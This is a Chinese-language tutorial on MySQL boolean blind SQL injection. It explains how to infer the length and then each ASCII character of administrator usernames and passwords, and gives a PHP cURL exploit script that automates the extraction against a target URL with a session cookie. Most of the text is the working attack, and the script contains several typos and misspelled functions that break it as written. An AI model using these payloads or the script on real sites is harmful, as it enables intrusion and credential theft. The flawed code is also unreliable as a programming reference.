盲注入原理
mysql的盲注入语句
得到表里的帐号和密码长度
select * from article where id=1 and LENGTH
(select GROUP_CONCAT(username,0x3a,password)from admin))=38
返回正常页面:
根据长度再判断每一位字符的ascii码
select * from article where id=1 and ascii(substring((select GROUP_CONCAT(username,0x3a,password)from admin,1,1))=97
注:admin a=97
页面正常显示
编写exp
原理:就是得到数据长度 再遍历每一个字符的ascii码再用ascii码转为字符
为什么不直接用字符?
因为用的php版本会开启gpc后,里面的单引号会被转义。
拿页面cookie值
<?php
//参数1:访问的url 参数2:post数据(不填则为GET) 参数3:提交的$cookies 参数4:是否返回$cookies
function curl_request($url,$post='',$cookie='',$returnCookie=0){
$curl=curl_init();
curl_setopt($curl,CURLOPT_URL,$url);
curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0(compatible;MSIE 10.0;windows NT 6.1;Trident/6.0)');
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
curl_setopt($curl,CURLOPT_AUTOREFERER,1);
curl_setopt($curl,CURLOPT_REFERER,"http://xxx");
if($post){
curl_setopt($curl,CUROPT_POST,1);
curl_setopt($curl,CUROPT_POSTFIELDS,http_build_query($post));
}
if($cookie){
curl_setopt($curl,CURLOPT_COOKIE,$cookie);
}
curl_setopt($curl,CURLOPT_HEADER,$returnCookie);
curl_setopt($curl,CURLOPT_TIMEOUT,10);
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
$data=curl_exec($cur1);
if(curl_errno($curl)){
return curl_error($curl);
}
curl_close($curl);
if($returnCookie){
list($header,$body)=explode("\r\n\r\n",$data,2);
preg_math_all("/Set\-Cookie:([^;]*);/",$header,$matches);
$info['cookie']=substr($matches[1][0],1);
$info['content']=$body;
return $info;
}else{
return $data;
}
}
//得到数据长度
function getstrlen($url,$cookie,$html){
$data_len='';
$i=1;
while(true){
$s="%20and%20LENGTH((select%20GROUP_CONCAT(username,0x3a,password)from%20admin))={$i}";
$urlexp=$url.$s;
if(strlen($html)==strlen(exploit($urlexp,$cookie))){
$data_len=$i;
break;
}
$i++;
}
return $data_len;
}
function exploit($url,$cookie){
$html=curl_request($url,'',$cookie);
return $html
}
function get_data($url,$cookie,$datalen,$tmp_html){
$admin_pass='';
for($i=1;$i<=$datalen;$i++){
for($j=1;$j<=125;$j++){
$s="%20and%20ascii(substring((select%20GROUP_CONCAT(username,0x3a,password)from%20admin),{$i},1))={$j}";
if(strlen($tmp_html)==strlen(exploit($url.$s,$cookie))){
$c=chr($j);
$admin_pass.=$c;
echo $admin_pass."\r\n";
break;
}
}
}
return $admin_pass;
}
$cookie='PHPSESSID=bn43dma24ghqeuosagkqj9ib45';
$url='http://www.moontestester.com/article.php?id=1';
//用来做比较用的
$tmp_html=exploit($url,$cookie);
$datalen=getstrlen($url,$cookie,$tmp_html);
if($datalen)
{
echo get_data($url,$cookie,$datalen,$tmp_html);
}else{
echo "data null";
}
?>
在终端运行如图所示:
最后结果: